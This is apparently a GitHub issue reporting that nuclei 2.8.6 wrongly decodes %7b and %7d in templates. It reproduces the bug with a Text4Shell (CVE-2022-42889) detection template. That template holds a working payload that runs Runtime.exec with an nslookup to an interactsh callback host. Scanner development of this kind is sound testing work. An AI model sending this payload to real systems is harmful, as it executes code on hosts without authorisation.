### ISSUE TITLE
2.8.6 decoded automatically

### ISSUE THREAD

**Issue by f0ng** [projectdiscovery/nuclei#3167]
### Nuclei version: 
2.8.6

### Current Behavior: 
In 2.8.6，the `%7b`、`%7d` in yaml file will be decoded automatically

### Expected Behavior:
the `%7b`、`%7d` in yaml file will not be decoded automatically

### Steps To Reproduce:
For example，CVE-2022-42889
the docker  https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git
my yaml file:
```yaml
id: CVE-2022-42889

info:
  name: Apache Text4shell
  author: f0ng
  severity: critical

requests:
  - raw:
      - |
        GET /text4shell/attack?search=$%7bscript:javascript:java.lang.Runtime.getRuntime().exec('nslookup%20{{Host}}.{{Port}}.getparam.{{interactsh-url}}')%7d HTTP/1.1
        Host: {{Hostname}}
        
    # unsafe: true
    stop-at-first-match: true
    # matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"
          - '{{Host}}.{{Port}}'
```
in 2.8.5，it works normally
<img width="792" alt="image" src="https://user-images.githubusercontent.com/48286013/211183383-4d9ea888-6440-4002-9e4a-827e8cd9f04f.png">
<img width="707" alt="image" src="https://user-images.githubusercontent.com/48286013/211183428-85b273dc-5f69-459b-9316-59e759299d4e.png">

but in 2.8.6，error

<img width="847" alt="image" src="https://user-images.githubusercontent.com/48286013/211183372-6c0ee565-20bb-494b-a8f7-db67af3e463a.png">
<img width="713" alt="image" src="https://user-images.githubusercontent.com/48286013/211183396-da19fb77-5fd3-4336-978f-d617e50cdc43.png">
the same yaml file，in the different versions, the %7b and %7d are different
